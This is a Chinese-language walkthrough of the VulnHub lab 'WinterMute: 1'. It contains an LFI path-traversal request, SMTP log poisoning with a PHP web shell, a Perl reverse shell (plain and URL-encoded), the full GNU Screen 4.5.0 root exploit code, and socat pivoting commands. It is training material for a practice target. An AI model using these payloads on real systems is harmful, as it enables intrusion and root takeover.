靶机地址:WinterMute: 1 ~ VulnHub
难易程度: 中文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
本次靶机实战分为两台靶机
摘要:访问默认80端口,目录扫描无发现,访问3000端口,提示admin登陆,找到目录提示信息,前往为查询页面,存在LFI漏洞,在开启的smtp服务上,写入一句话(这里需要进行编码),使用kali监听,得到低权限用户,进去查看SUID权限文件,发现screen-4.5.0文件,通过EDB-ID-41154的POC进行提权。
待完善地方:第二台靶机配置了环境,并且端口转发后网站发现没有文件,访问不到,有空补充。smtp服务写一句话的原理
主机探测&端口扫描
这里靶机为两个,ip分别为
- 192.168.31.83
- 192.168.31.133
端口扫描结果:
192.168.31.83
192.168.31.133
信息搜集
查看页面信息
等一会后会自动重定向到下面界面
gobuster dir -u http://192.168.31.83 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
dir:传统的目录爆破模式
-u:目标url
-w:指定字典
-x:要搜索的文件扩展名
gobuster使用参考:
http://www.52bug.cn/hacktool/6166.html
https://github.com/OJ/gobuster
https://blog.csdn.net/nzjdsds/article/details/86756828
扫到几个目录,前往/freeside下看看,并没有什么东西
再前往3000端口看看,最下面提示admin账号密码
网页下搜集信息,发现一个目录/turing-bolo
访问该目录
向下滑动有个查询按钮
访问该文件,发现存在LFI漏洞,在结合该服务器上有smtp服务,直接访问该服务的log文件
http://192.168.31.83//turing-bolo/molly.log
访问该服务的log文件
http://192.168.31.83//turing-bolo/bolo.php?bolo=../../../../var/log/mail
权限获取
使用nc登陆进smtp服务里,写一封邮件带有一句话
nc 192.168.31.83 25
HELO xigua
MAIL FROM: "xigua <?php echo shell_exec($_GET['cmd']);?>"
RCPT TO:root
DATA
.
HELO 向服务器标示用户身份
MAIL FROM 自己的邮箱
RCPT TO 对方的邮箱
DATA 后面开始写邮件内容
. 结束DATA指令参考:https://blog.csdn.net/yangruini_love/article/details/78260401
测试是否写入成功
http://192.168.31.83//turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd=id
开始反弹shell,脚本命令如下,这里需要经过url编码,在bp上进行url编码
perl -e 'use Socket;$i="192.168.31.196";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
%70%65%72%6c%20%2d%65%20%27%75%73%65%20%53%6f%63%6b%65%74%3b%24%69%3d%22%31%39%32%2e%31%36%38%2e%33%31%2e%31%39%36%22%3b%24%70%3d%31%32%33%34%3b%73%6f%63%6b%65%74%28%53%2c%50%46%5f%49%4e%45%54%2c%53%4f%43%4b%5f%53%54%52%45%41%4d%2c%67%65%74%70%72%6f%74%6f%62%79%6e%61%6d%65%28%22%74%63%70%22%29%29%3b%69%66%28%63%6f%6e%6e%65%63%74%28%53%2c%73%6f%63%6b%61%64%64%72%5f%69%6e%28%24%70%2c%69%6e%65%74%5f%61%74%6f%6e%28%24%69%29%29%29%29%7b%6f%70%65%6e%28%53%54%44%49%4e%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%4f%55%54%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%45%52%52%2c%22%3e%26%53%22%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%62%61%73%68%20%2d%69%22%29%3b%7d%3b%27%0a
先在kali上开启监听
nc -lnvp 1234
后在浏览器上执行
http://192.168.31.83//turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd=%70%65%72%6c%20%2d%65%20%27%75%73%65%20%53%6f%63%6b%65%74%3b%24%69%3d%22%31%39%32%2e%31%36%38%2e%33%31%2e%31%39%36%22%3b%24%70%3d%31%32%33%34%3b%73%6f%63%6b%65%74%28%53%2c%50%46%5f%49%4e%45%54%2c%53%4f%43%4b%5f%53%54%52%45%41%4d%2c%67%65%74%70%72%6f%74%6f%62%79%6e%61%6d%65%28%22%74%63%70%22%29%29%3b%69%66%28%63%6f%6e%6e%65%63%74%28%53%2c%73%6f%63%6b%61%64%64%72%5f%69%6e%28%24%70%2c%69%6e%65%74%5f%61%74%6f%6e%28%24%69%29%29%29%29%7b%6f%70%65%6e%28%53%54%44%49%4e%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%4f%55%54%2c%22%3e%26%53%22%29%3b%6f%70%65%6e%28%53%54%44%45%52%52%2c%22%3e%26%53%22%29%3b%65%78%65%63%28%22%2f%62%69%6e%2f%62%61%73%68%20%2d%69%22%29%3b%7d%3b%27%0a
权限提升【1】
SUID提权
枚举所有具有SUID权限的二进制文件
find / -perm -4000 2>/dev/null
查找主系统目录下
/,文件具有SUID的文件-perm -4000,将错误信息2,重定向到null文件中>/dev/null参考该页面的实例部分:https://www.runoob.com/linux/linux-comm-find.html
SUID参考:https://blog.csdn.net/weixin_44575881/article/details/86552016
很明显看到一个screen-4.5.0文件,利用该文件的本地权限提升漏洞进行提权,EXP:GNU Screen 4.5.0 - Local Privilege Escalation - Linux local Exploit (exploit-db.com)
可以直接下载该脚本文件,也可以通过EXP提供的信息一步步手动进行操作即可,这里手动操作简要解释
1)创建libhax.c文件
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!
");
}
EOF
2)编译libhax.c文件
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
3)创建rootshell.c文件
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
4)编译rootshell.c文件
gcc -o /tmp/rootshell /tmp/rootshell.c
5)一系列操作提权
cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne "x0a/tmp/libhax.so"
screen -ls
umask使用参考:https://www.cnblogs.com/zhaojiedi1992/p/zhaojiedi_linux_001.html
6)执行脚本提权
/tmp/rootshell
装上pty-shell
python -c "import pty;pty.spawn('/bin/bash')"
成功获得flag
权限提升【2】【未】
端口转发成功,但是访问8080端口没有页面回显,有些bug。明天在看看,以后完善
10.0.3.15
for i in $(seq 1 255); do ping -c 1 10.0.3.$i; done | grep "bytes from"
for i in $(seq 1 255); do ping -c 1 192.168.212.$i; done | grep "bytes from"
for i in $(seq 1 65535); do nc -nvz -w 1 10.0.3.4 $i 2>&1; done | grep -v "Connection refused"
for i in $(seq 8079 8081); do nc -nvz -w 1 10.0.3.2 $i 2>&1; done
socat TCP-LISTEN:8009,fork,reuseaddr TCP:10.0.3.4:8009 &
socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.0.3.4:8080 &
socat TCP-LISTEN:34483,fork,reuseaddr TCP:10.0.3.4:34483 &
socat tcp-listen:8009,fork tcp:10.0.3.4:8009 &
socat tcp-listen:8080,fork tcp:10.0.3.4:8080 &
socat tcp-listen:34483,fork tcp:10.0.3.4:34483 &
socat tcp-listen:4321,fork tcp:10.0.3.4:4321 &
进程控制相关代码:https://baijiahao.baidu.com/s?id=1617448120776344096&wfr=spider&for=pc
nmap -sT -sV -T5 -p 8009,8080,34483 192.168.31.83
nmap -sV -p 8009,8080,34483 192.168.31.83
8080/struts2_2.3.15.1-showcase/showcase.jsp
总结
SUID提权|find / -perm -4000 2>/dev/nullperl反向shell脚本
参考
WinterMute: 1 Walkthrough (hackso.me)
No.19-VulnHub-WinterMute: 1 -Walkthrough-CSDN博客
Vulnhub-靶机-WINTERMUTE: 1 - 博客园
WinterMute One - Writeup - Jack Barradell-Johns (barradell-johns.com)